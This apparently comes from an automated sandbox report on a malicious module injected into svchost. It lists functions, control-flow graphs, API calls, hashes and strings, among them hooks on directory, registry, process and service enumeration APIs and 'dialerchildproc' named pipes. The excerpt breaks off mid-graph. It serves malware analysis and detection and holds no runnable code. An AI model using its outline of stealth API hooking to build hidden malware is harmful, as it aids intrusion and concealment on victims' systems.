                                                                                  • Part of subcall function 00000257E10A1628: RegCloseKey.ADVAPI32 ref: 00000257E10A1820
                                                                                  • Part of subcall function 00000257E10A1628: RegOpenKeyExW.ADVAPI32 ref: 00000257E10A1840
                                                                                  • Part of subcall function 00000257E10A1628: RegCloseKey.ADVAPI32 ref: 00000257E10A185B
                                                                                  • Part of subcall function 00000257E10A1628: RegOpenKeyExW.ADVAPI32 ref: 00000257E10A187B
                                                                                  • Part of subcall function 00000257E10A1628: RegCloseKey.ADVAPI32 ref: 00000257E10A1896
                                                                                  • Part of subcall function 00000257E10A1628: RegCloseKey.ADVAPI32 ref: 00000257E10A18A0
                                                                                Memory Dump Source
                                                                                • Source File: 0000002E.00000002.3372775288.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_46_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CloseOpen$HeapSleep$AllocProcess
                                                                                • String ID:
                                                                                • API String ID: 1534210851-0
                                                                                • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                                • Instruction ID: d712d7bd41ce4f32cb42d1788969e2e1ab98e8c502d066c5c5fdd1db537eb6f4
                                                                                • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                                • Instruction Fuzzy Hash: 9F31F871298F4582FF5E9726FE4B3E923A4AB44BC2F0858615E0987695FF34C451C228
                                                                                Function 00000257E107273C Relevance: 1.7, APIs: 1, Instructions: 187libraryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 110 257e107273c-257e10727a4 call 257e10729d4 * 4 119 257e10727aa-257e10727ad 110->119 120 257e10729b2 110->120 119->120 122 257e10727b3-257e10727b6 119->122 121 257e10729b4-257e10729d0 120->121 122->120 123 257e10727bc-257e10727bf 122->123 123->120 124 257e10727c5-257e10727e6 123->124 124->120 126 257e10727ec-257e107280c 124->126 127 257e107280e-257e1072836 126->127 128 257e1072838-257e107283f 126->128 127->127 127->128 129 257e1072845-257e1072852 128->129 130 257e10728df-257e10728e6 128->130 129->130 133 257e1072858-257e107286a LoadLibraryA 129->133 131 257e10728ec-257e1072901 130->131 132 257e1072992-257e10729b0 130->132 131->132 134 257e1072907 131->134 132->121 135 257e107286c-257e1072878 133->135 136 257e10728ca-257e10728d2 133->136 139 257e107290d-257e1072921 134->139 140 257e10728c5-257e10728c8 135->140 136->133 137 257e10728d4-257e10728d9 136->137 137->130 142 257e1072923-257e1072934 139->142 143 257e1072982-257e107298c 139->143 140->136 141 257e107287a-257e107287d 140->141 147 257e10728a7-257e10728b7 141->147 148 257e107287f-257e10728a5 141->148 145 257e1072936-257e107293d 142->145 146 257e107293f-257e1072943 142->146 143->132 143->139 149 257e1072970-257e1072980 145->149 150 257e107294d-257e1072951 146->150 151 257e1072945-257e107294b 146->151 152 257e10728ba-257e10728c1 147->152 148->152 149->142 149->143 153 257e1072963-257e1072967 150->153 154 257e1072953-257e1072961 150->154 151->149 152->140 153->149 156 257e1072969-257e107296c 153->156 154->149 156->149
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000002E.00000002.3372076876.00000257E1070000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E1070000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_46_2_257e1070000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: LibraryLoad
                                                                                • String ID:
                                                                                • API String ID: 1029625771-0
                                                                                • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                                • Instruction ID: e1821c6af69327561f239fb501c7fdcfb84665abf8bb743926d129d5342e2f1a
                                                                                • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                                • Instruction Fuzzy Hash: 4E617572B49B9087DB5AEF14E80B73DB3A2F744BE5F188161DE4903788CA78D852C704

                                                                                Non-executed Functions

                                                                                Function 00000257E10A2B2C Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264stringlibraryloaderCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 365 257e10a2b2c-257e10a2ba5 call 257e10c2ce0 368 257e10a2ee0-257e10a2f03 365->368 369 257e10a2bab-257e10a2bb1 365->369 369->368 370 257e10a2bb7-257e10a2bba 369->370 370->368 371 257e10a2bc0-257e10a2bc3 370->371 371->368 372 257e10a2bc9-257e10a2bd9 GetModuleHandleA 371->372 373 257e10a2bed 372->373 374 257e10a2bdb-257e10a2beb call 257e10b6090 372->374 376 257e10a2bf0-257e10a2c0e 373->376 374->376 376->368 379 257e10a2c14-257e10a2c33 StrCmpNIW 376->379 379->368 380 257e10a2c39-257e10a2c3d 379->380 380->368 381 257e10a2c43-257e10a2c4d 380->381 381->368 382 257e10a2c53-257e10a2c5a 381->382 382->368 383 257e10a2c60-257e10a2c73 382->383 384 257e10a2c75-257e10a2c81 383->384 385 257e10a2c83 383->385 386 257e10a2c86-257e10a2c8a 384->386 385->386 387 257e10a2c9a 386->387 388 257e10a2c8c-257e10a2c98 386->388 389 257e10a2c9d-257e10a2ca7 387->389 388->389 390 257e10a2d9d-257e10a2da1 389->390 391 257e10a2cad-257e10a2cb0 389->391 394 257e10a2ed2-257e10a2eda 390->394 395 257e10a2da7-257e10a2daa 390->395 392 257e10a2cc2-257e10a2ccc 391->392 393 257e10a2cb2-257e10a2cbf call 257e10a199c 391->393 397 257e10a2d00-257e10a2d0a 392->397 398 257e10a2cce-257e10a2cdb 392->398 393->392 394->368 394->383 399 257e10a2dbb-257e10a2dc5 395->399 400 257e10a2dac-257e10a2db8 call 257e10a199c 395->400 406 257e10a2d3a-257e10a2d3d 397->406 407 257e10a2d0c-257e10a2d19 397->407 398->397 405 257e10a2cdd-257e10a2cea 398->405 402 257e10a2df5-257e10a2df8 399->402 403 257e10a2dc7-257e10a2dd4 399->403 400->399 412 257e10a2e05-257e10a2e12 lstrlenW 402->412 413 257e10a2dfa-257e10a2e03 call 257e10a1bbc 402->413 403->402 411 257e10a2dd6-257e10a2de3 403->411 414 257e10a2ced-257e10a2cf3 405->414 409 257e10a2d3f-257e10a2d49 call 257e10a1bbc 406->409 410 257e10a2d4b-257e10a2d58 lstrlenW 406->410 407->406 415 257e10a2d1b-257e10a2d28 407->415 409->410 421 257e10a2d93-257e10a2d98 409->421 417 257e10a2d5a-257e10a2d64 410->417 418 257e10a2d7b-257e10a2d8d call 257e10a3844 410->418 419 257e10a2de6-257e10a2dec 411->419 423 257e10a2e35-257e10a2e3f call 257e10a3844 412->423 424 257e10a2e14-257e10a2e1e 412->424 413->412 429 257e10a2e4a-257e10a2e55 413->429 414->421 422 257e10a2cf9-257e10a2cfe 414->422 425 257e10a2d2b-257e10a2d31 415->425 417->418 428 257e10a2d66-257e10a2d79 call 257e10a152c 417->428 418->421 433 257e10a2e42-257e10a2e44 418->433 419->429 430 257e10a2dee-257e10a2df3 419->430 421->433 422->397 422->414 423->433 424->423 434 257e10a2e20-257e10a2e33 call 257e10a152c 424->434 425->421 435 257e10a2d33-257e10a2d38 425->435 428->418 428->421 437 257e10a2e57-257e10a2e5b 429->437 438 257e10a2ecc-257e10a2ed0 429->438 430->402 430->419 433->394 433->429 434->423 434->429 435->406 435->425 442 257e10a2e63-257e10a2e7d call 257e10a85c0 437->442 443 257e10a2e5d-257e10a2e61 437->443 438->394 446 257e10a2e80-257e10a2e83 442->446 443->442 443->446 449 257e10a2e85-257e10a2ea3 call 257e10a85c0 446->449 450 257e10a2ea6-257e10a2ea9 446->450 449->450 450->438 452 257e10a2eab-257e10a2ec9 call 257e10a85c0 450->452 452->438
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002E.00000002.3372775288.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_46_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                                • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                                • API String ID: 2119608203-3850299575
                                                                                • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                                • Instruction ID: a05134c9a34ff4c1d66afd38e5ef54d71b3b96099cc726008d15654598d14383
                                                                                • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                                • Instruction Fuzzy Hash: 3BB1D032258F5482EB6EDF25EC4B7A963A5F744B86F0450A6EE0953B95DF34CC80C398
                                                                                Function 00000257E10A7D90 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000002E.00000002.3372775288.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_46_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                • String ID:
                                                                                • API String ID: 3140674995-0
                                                                                • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                                • Instruction ID: 219ced55679ac893985f66a80f0dbd7178f5651cf27174fbf386b8ec505e6a56
                                                                                • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                                • Instruction Fuzzy Hash: 29314A72249F808AEB65DF60F8867EE7360F784745F44802ADA4E57B98EF38C648C714
                                                                                Function 00000257E10AD2A4 Relevance: 9.1, APIs: 6, Instructions: 83COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000002E.00000002.3372775288.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_46_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                • String ID:
                                                                                • API String ID: 1239891234-0
                                                                                • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                                • Instruction ID: 3bbfa850ad8dbd0e4a6fa2243018912ee9c80721fc4e2599e2c74e45bb328308
                                                                                • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                                • Instruction Fuzzy Hash: 1531AD32258F8086EB69CF25FC467AE73A0F789755F504166EA9D43B98EF38C145CB04
                                                                                Function 00000257E10A12BC Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002E.00000002.3372775288.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_46_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                                • String ID: d
                                                                                • API String ID: 2005889112-2564639436
                                                                                • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                                • Instruction ID: eced55502f1a75a026b6edf846e6a0891afcc2511a2fde73ec7a25957e053ce4
                                                                                • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                                • Instruction Fuzzy Hash: 39517C32248F8486EB59CF66F84A75A77A1F389F8AF088524DE5907718DF3CC049C704
                                                                                Function 00000257E10A1D14 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65threadCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002E.00000002.3372775288.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_46_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentThread$AddressHandleModuleProc
                                                                                • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                                                • API String ID: 4175298099-1975688563
                                                                                • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                                • Instruction ID: 729b3f40a99a6114c8675349f500bf02ad9969b64215182506dd6b7d13de966c
                                                                                • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                                • Instruction Fuzzy Hash: 6C319574298F4AE1EA0FEFA5FCABBD46325B75434BF8054A3940902576DF3C8249C768
                                                                                Function 00000257E1076910 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 230COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 207 257e1076910-257e1076916 208 257e1076918-257e107691b 207->208 209 257e1076951-257e107695b 207->209 210 257e107691d-257e1076920 208->210 211 257e1076945-257e1076984 call 257e1076fc0 208->211 212 257e1076a78-257e1076a8d 209->212 213 257e1076938 __scrt_dllmain_crt_thread_attach 210->213 214 257e1076922-257e1076925 210->214 227 257e107698a-257e107699f call 257e1076e54 211->227 228 257e1076a52 211->228 215 257e1076a9c-257e1076ab6 call 257e1076e54 212->215 216 257e1076a8f 212->216 222 257e107693d-257e1076944 213->222 218 257e1076927-257e1076930 214->218 219 257e1076931-257e1076936 call 257e1076f04 214->219 230 257e1076ab8-257e1076aed call 257e1076f7c call 257e1076e1c call 257e1077318 call 257e1077130 call 257e1077154 call 257e1076fac 215->230 231 257e1076aef-257e1076b20 call 257e1077190 215->231 220 257e1076a91-257e1076a9b 216->220 219->222 239 257e1076a6a-257e1076a77 call 257e1077190 227->239 240 257e10769a5-257e10769b6 call 257e1076ec4 227->240 232 257e1076a54-257e1076a69 228->232 230->220 241 257e1076b22-257e1076b28 231->241 242 257e1076b31-257e1076b37 231->242 239->212 259 257e10769b8-257e10769dc call 257e10772dc call 257e1076e0c call 257e1076e38 call 257e107ac0c 240->259 260 257e1076a07-257e1076a11 call 257e1077130 240->260 241->242 246 257e1076b2a-257e1076b2c 241->246 247 257e1076b7e-257e1076b94 call 257e107268c 242->247 248 257e1076b39-257e1076b43 242->248 253 257e1076c1f-257e1076c2c 246->253 268 257e1076bcc-257e1076bce 247->268 269 257e1076b96-257e1076b98 247->269 254 257e1076b45-257e1076b4d 248->254 255 257e1076b4f-257e1076b5d call 257e1085780 248->255 262 257e1076b63-257e1076b78 call 257e1076910 254->262 255->262 272 257e1076c15-257e1076c1d 255->272 259->260 310 257e10769de-257e10769e5 __scrt_dllmain_after_initialize_c 259->310 260->228 280 257e1076a13-257e1076a1f call 257e1077180 260->280 262->247 262->272 270 257e1076bd5-257e1076bea call 257e1076910 268->270 271 257e1076bd0-257e1076bd3 268->271 269->268 277 257e1076b9a-257e1076bbc call 257e107268c call 257e1076a78 269->277 270->272 289 257e1076bec-257e1076bf6 270->289 271->270 271->272 272->253 277->268 304 257e1076bbe-257e1076bc6 call 257e1085780 277->304 297 257e1076a45-257e1076a50 280->297 298 257e1076a21-257e1076a2b call 257e1077098 280->298 294 257e1076bf8-257e1076bff 289->294 295 257e1076c01-257e1076c11 call 257e1085780 289->295 294->272 295->272 297->232 298->297 309 257e1076a2d-257e1076a3b 298->309 304->268 309->297 310->260 311 257e10769e7-257e1076a04 call 257e107abc8 310->311 311->260
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002E.00000002.3372076876.00000257E1070000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E1070000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_46_2_257e1070000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                                                • API String ID: 190073905-1786718095
                                                                                • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                • Instruction ID: c413f792152c6e77bcdec011d4ce604bdbff46f8c7e2d41a41648d6f97dd56db
                                                                                • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                • Instruction Fuzzy Hash: 7481476178CF0586F65FBB2ABC4F3B922D0E785782F5480A49A2647797DB38C8458B0C
                                                                                Function 00000257E10ACE28 Relevance: 18.1, APIs: 12, Instructions: 112COMMONLIBRARYCODE
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetLastError.KERNEL32 ref: 00000257E10ACE37
                                                                                • FlsGetValue.KERNEL32(?,?,?,00000257E10B0A6B,?,?,?,00000257E10B045C,?,?,?,00000257E10AC84F), ref: 00000257E10ACE4C
                                                                                • FlsSetValue.KERNEL32(?,?,?,00000257E10B0A6B,?,?,?,00000257E10B045C,?,?,?,00000257E10AC84F), ref: 00000257E10ACE6D
                                                                                • FlsSetValue.KERNEL32(?,?,?,00000257E10B0A6B,?,?,?,00000257E10B045C,?,?,?,00000257E10AC84F), ref: 00000257E10ACE9A
                                                                                • FlsSetValue.KERNEL32(?,?,?,00000257E10B0A6B,?,?,?,00000257E10B045C,?,?,?,00000257E10AC84F), ref: 00000257E10ACEAB
                                                                                • FlsSetValue.KERNEL32(?,?,?,00000257E10B0A6B,?,?,?,00000257E10B045C,?,?,?,00000257E10AC84F), ref: 00000257E10ACEBC
                                                                                • SetLastError.KERNEL32 ref: 00000257E10ACED7
                                                                                • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000257E10B0A6B,?,?,?,00000257E10B045C,?,?,?,00000257E10AC84F), ref: 00000257E10ACF0D
                                                                                • FlsSetValue.KERNEL32(?,?,00000001,00000257E10AECCC,?,?,?,?,00000257E10ABF9F,?,?,?,?,?,00000257E10A7AB0), ref: 00000257E10ACF2C
                                                                                  • Part of subcall function 00000257E10AD6CC: HeapAlloc.KERNEL32 ref: 00000257E10AD721
                                                                                • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000257E10B0A6B,?,?,?,00000257E10B045C,?,?,?,00000257E10AC84F), ref: 00000257E10ACF54
                                                                                  • Part of subcall function 00000257E10AD744: HeapFree.KERNEL32 ref: 00000257E10AD75A
                                                                                  • Part of subcall function 00000257E10AD744: GetLastError.KERNEL32 ref: 00000257E10AD764
                                                                                • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000257E10B0A6B,?,?,?,00000257E10B045C,?,?,?,00000257E10AC84F), ref: 00000257E10ACF65
                                                                                • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000257E10B0A6B,?,?,?,00000257E10B045C,?,?,?,00000257E10AC84F), ref: 00000257E10ACF76
                                                                                Memory Dump Source
                                                                                • Source File: 0000002E.00000002.3372775288.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_46_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Value$ErrorLast$Heap$AllocFree
                                                                                • String ID:
                                                                                • API String ID: 570795689-0
                                                                                • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                                • Instruction ID: 44b74c0836ad876a2fac46d0e824247e53a8591ac7bd446e8d08f2f1267c89cf
                                                                                • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                                • Instruction Fuzzy Hash: 3D4182703CDF4441FAAFA7357E5F3AD22815B447B2F6547A4A936066D6DE38C401872C
                                                                                Function 00000257E10A2244 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52filethreadCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002E.00000002.3372775288.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_46_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                                                • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                                                • API String ID: 2171963597-1373409510
                                                                                • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                                • Instruction ID: fd144254930c9193e2e316754b6910d439631fa1b8b54bcb3ad30ea55ac0c1ae
                                                                                • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                                • Instruction Fuzzy Hash: DB214F32658F4082FB19CB25F84A75A73A0F789BA6F504255EA6903BA8CF3CC149CF04
                                                                                Function 00000257E10AA544 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 586 257e10aa544-257e10aa5ac call 257e10ab414 589 257e10aa5b2-257e10aa5b5 586->589 590 257e10aaa13-257e10aaa1b call 257e10ac748 586->590 589->590 591 257e10aa5bb-257e10aa5c1 589->591 593 257e10aa690-257e10aa6a2 591->593 594 257e10aa5c7-257e10aa5cb 591->594 596 257e10aa963-257e10aa967 593->596 597 257e10aa6a8-257e10aa6ac 593->597 594->593 598 257e10aa5d1-257e10aa5dc 594->598 601 257e10aa9a0-257e10aa9aa call 257e10a9634 596->601 602 257e10aa969-257e10aa970 596->602 597->596 599 257e10aa6b2-257e10aa6bd 597->599 598->593 600 257e10aa5e2-257e10aa5e7 598->600 599->596 603 257e10aa6c3-257e10aa6ca 599->603 600->593 604 257e10aa5ed-257e10aa5f7 call 257e10a9634 600->604 601->590 615 257e10aa9ac-257e10aa9cb call 257e10a7940 601->615 602->590 605 257e10aa976-257e10aa99b call 257e10aaa1c 602->605 607 257e10aa6d0-257e10aa707 call 257e10a9a10 603->607 608 257e10aa894-257e10aa8a0 603->608 604->615 619 257e10aa5fd-257e10aa628 call 257e10a9634 * 2 call 257e10a9d24 604->619 605->601 607->608 624 257e10aa70d-257e10aa715 607->624 608->601 612 257e10aa8a6-257e10aa8aa 608->612 616 257e10aa8ba-257e10aa8c2 612->616 617 257e10aa8ac-257e10aa8b8 call 257e10a9ce4 612->617 616->601 623 257e10aa8c8-257e10aa8d5 call 257e10a98b4 616->623 617->616 630 257e10aa8db-257e10aa8e3 617->630 655 257e10aa62a-257e10aa62e 619->655 656 257e10aa648-257e10aa652 call 257e10a9634 619->656 623->601 623->630 628 257e10aa719-257e10aa74b 624->628 632 257e10aa751-257e10aa75c 628->632 633 257e10aa887-257e10aa88e 628->633 635 257e10aa9f6-257e10aaa12 call 257e10a9634 * 2 call 257e10ac6a8 630->635 636 257e10aa8e9-257e10aa8ed 630->636 632->633 637 257e10aa762-257e10aa77b 632->637 633->608 633->628 635->590 639 257e10aa8ef-257e10aa8fe call 257e10a9ce4 636->639 640 257e10aa900 636->640 641 257e10aa781-257e10aa7c6 call 257e10a9cf8 * 2 637->641 642 257e10aa874-257e10aa879 637->642 650 257e10aa903-257e10aa90d call 257e10ab4ac 639->650 640->650 667 257e10aa804-257e10aa80a 641->667 668 257e10aa7c8-257e10aa7ee call 257e10a9cf8 call 257e10aac38 641->668 647 257e10aa884 642->647 647->633 650->601 664 257e10aa913-257e10aa961 call 257e10a9944 call 257e10a9b50 650->664 655->656 661 257e10aa630-257e10aa63b 655->661 656->593 671 257e10aa654-257e10aa674 call 257e10a9634 * 2 call 257e10ab4ac 656->671 661->656 663 257e10aa63d-257e10aa642 661->663 663->590 663->656 664->601 675 257e10aa87b 667->675 676 257e10aa80c-257e10aa810 667->676 686 257e10aa7f0-257e10aa802 668->686 687 257e10aa815-257e10aa872 call 257e10aa470 668->687 692 257e10aa676-257e10aa680 call 257e10ab59c 671->692 693 257e10aa68b 671->693 680 257e10aa880 675->680 676->641 680->647 686->667 686->668 687->680 696 257e10aa9f0-257e10aa9f5 call 257e10ac6a8 692->696 697 257e10aa686-257e10aa9ef call 257e10a92ac call 257e10aaff4 call 257e10a94a0 692->697 693->593 696->635 697->696
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002E.00000002.3372775288.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_46_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                • String ID: csm$csm$csm
                                                                                • API String ID: 849930591-393685449
                                                                                • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                                • Instruction ID: fa66f7741ebcd80bb86e54b7b1d1724f64a0d38ed48e78e569a20c50e363ff0f
                                                                                • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                                • Instruction Fuzzy Hash: 46E1E572648F40CAEB6ADF65E84B39D77A0F748B99F100155EE8957B95CF34C081C714
                                                                                Function 00000257E1079944 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 465 257e1079944-257e10799ac call 257e107a814 468 257e1079e13-257e1079e1b call 257e107bb48 465->468 469 257e10799b2-257e10799b5 465->469 469->468 470 257e10799bb-257e10799c1 469->470 472 257e10799c7-257e10799cb 470->472 473 257e1079a90-257e1079aa2 470->473 472->473 477 257e10799d1-257e10799dc 472->477 475 257e1079aa8-257e1079aac 473->475 476 257e1079d63-257e1079d67 473->476 475->476 480 257e1079ab2-257e1079abd 475->480 478 257e1079d69-257e1079d70 476->478 479 257e1079da0-257e1079daa call 257e1078a34 476->479 477->473 481 257e10799e2-257e10799e7 477->481 478->468 482 257e1079d76-257e1079d9b call 257e1079e1c 478->482 479->468 491 257e1079dac-257e1079dcb call 257e1076d40 479->491 480->476 484 257e1079ac3-257e1079aca 480->484 481->473 485 257e10799ed-257e10799f7 call 257e1078a34 481->485 482->479 488 257e1079c94-257e1079ca0 484->488 489 257e1079ad0-257e1079b07 call 257e1078e10 484->489 485->491 499 257e10799fd-257e1079a28 call 257e1078a34 * 2 call 257e1079124 485->499 488->479 492 257e1079ca6-257e1079caa 488->492 489->488 504 257e1079b0d-257e1079b15 489->504 496 257e1079cac-257e1079cb8 call 257e10790e4 492->496 497 257e1079cba-257e1079cc2 492->497 496->497 513 257e1079cdb-257e1079ce3 496->513 497->479 503 257e1079cc8-257e1079cd5 call 257e1078cb4 497->503 533 257e1079a2a-257e1079a2e 499->533 534 257e1079a48-257e1079a52 call 257e1078a34 499->534 503->479 503->513 505 257e1079b19-257e1079b4b 504->505 510 257e1079c87-257e1079c8e 505->510 511 257e1079b51-257e1079b5c 505->511 510->488 510->505 511->510 514 257e1079b62-257e1079b7b 511->514 515 257e1079ce9-257e1079ced 513->515 516 257e1079df6-257e1079e12 call 257e1078a34 * 2 call 257e107baa8 513->516 518 257e1079c74-257e1079c79 514->518 519 257e1079b81-257e1079bc6 call 257e10790f8 * 2 514->519 520 257e1079d00 515->520 521 257e1079cef-257e1079cfe call 257e10790e4 515->521 516->468 524 257e1079c84 518->524 546 257e1079bc8-257e1079bee call 257e10790f8 call 257e107a038 519->546 547 257e1079c04-257e1079c0a 519->547 529 257e1079d03-257e1079d0d call 257e107a8ac 520->529 521->529 524->510 529->479 544 257e1079d13-257e1079d61 call 257e1078d44 call 257e1078f50 529->544 533->534 538 257e1079a30-257e1079a3b 533->538 534->473 550 257e1079a54-257e1079a74 call 257e1078a34 * 2 call 257e107a8ac 534->550 538->534 543 257e1079a3d-257e1079a42 538->543 543->468 543->534 544->479 566 257e1079c15-257e1079c72 call 257e1079870 546->566 567 257e1079bf0-257e1079c02 546->567 554 257e1079c0c-257e1079c10 547->554 